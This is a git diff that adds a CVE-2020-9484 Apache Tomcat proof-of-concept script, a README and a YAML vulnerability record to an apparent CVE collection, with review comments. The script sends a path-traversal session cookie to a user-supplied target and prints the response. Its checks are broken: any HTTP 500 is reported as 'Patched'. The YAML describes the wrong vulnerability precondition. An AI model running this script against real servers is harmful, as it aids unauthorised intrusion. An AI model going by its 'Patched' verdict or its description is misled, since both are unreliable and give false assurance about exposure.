diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
new file mode 100644
index 0000000000000000000000000000000000000000..084b803fc5b02a4ed7288e5bc5987c12935bc10b
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
@@ -0,0 +1,37 @@
+import requests
+import os, sys
+
+
+
+def main():
+ print("CVE: CVE-2020-9484")
+ RHOST = input("Target : ")
+ try:
+ u = requests.get(f"{RHOST}/index.jsp")
+ if u.status_code == 200:
+ print("Found Index Page")
+ pass
+ elif u.status_code == 404:
+ print("Looks Like we Could not Find index Page")
+ sys.exit()
+ header = {
+ "Cookie": "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+ }
+ sett = requests.get(f"{RHOST}/index.jsp", headers=header)
+ if sett.status_code == 200:
+ print(sett.text)
+ #os.system(f"curl '{RHOST}/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -oh 'java' | sort -u == 'java' | tee result.txt | -o /dev/null")
+ #print("If Any Results They Will be Saved in result.txt")
+ print("Output ^")
+ if sett.status_code == 500:
+ print("Patched")
+ sys.exit()
+
+ if sett.text == " ":
+ print("No Content")
+ pass
+
+ except Exception as e:
+ print("Looks Like there Was A Problem Connecting to Target")
+
+main()
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/README.md b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..1f18c3ce24974380f0e7646c8dd6dbbd8106a797
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
@@ -0,0 +1,13 @@
+# Tomcat-RCE
+Apache Tomcat RCE
+#Use
+Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。攻击者可能可以构造恶意请求,造成反序列化代码执行漏洞。
+[-] Apache Tomcat RCE漏洞 (CVE-2020-9484)
+
+
+# eg
+
+python3 CVE-2020-9484.py
+
+# reference
+code from: https://github.com/RepublicR0K/CVE-2020-9484
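Review bot: In `main()` of CVE-2020-9484.py the `if sett.status_code == 500:` branch prints "Patched", but a 500 only says the request failed server-side; a Tomcat that tried to load the session file named by the cookie may well answer with an error too, so this verdict can give false assurance. A 200 merely dumps the page body and `sett.text == " "` compares against a single space, so no branch actually establishes the state of the host. I would report the status as inconclusive, e.g. `print("HTTP 500: inconclusive, confirm the Tomcat version and PersistentManager/FileStore configuration")`, and treat version plus configuration as the authoritative check. The handler `except Exception as e:` also hides every non-network error behind the connection message and neither `requests.get` call sets a timeout; `except requests.RequestException as e:` and `timeout=10` would keep the reported result honest.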
diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..e4cf2843d01133e28021b85a4daea0884c53fdda
--- /dev/null
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-9484
+source: https://github.com/RepublicR0K/CVE-2020-9484
+info:
+ name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+ severity: high
+ description:
+ 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+ scope-of-influence:
+ Apache Tomcat < 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54, 7.0.0 to 7.0.103
+ reference:
+ - https://seclists.org/oss-sec/2020/q2/136
+ - https://www.seebug.org/vuldb/ssvid-98234
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.0
+ cve-id: CVE-2020-9484
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Apache, Tomcat, RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index b35d0b64427106bfae1b10501e49d72e415179a1..eb286f76b593eeed2f460bf403a851ef361617b9 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -10,6 +10,7 @@ cve: - CVE-2021-27905 apache-tomcat: - CVE-2022-29885 + - CVE-2020-9484 apache-Spark: - CVE-2022-33891 linux-kernel:
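Review bot: The `description` in CVE-2020-9484.yaml (and the same text placed in `name`) talks about session synchronisation configured without EncryptInterceptor, which looks like the cluster session-replication issue rather than CVE-2020-9484; as published, this CVE concerns deserialization of a session file when PersistentManager is used with a FileStore. Anyone triaging from this record would end up checking the wrong configuration, so the description should state the PersistentManager/FileStore precondition instead. `name` should be a short title such as `name: Apache Tomcat session persistence deserialization RCE`, and `scope-of-influence` carries a stray `<` before the first range (`Apache Tomcat 10.0.0-M1 to 10.0.0-M4, ...`).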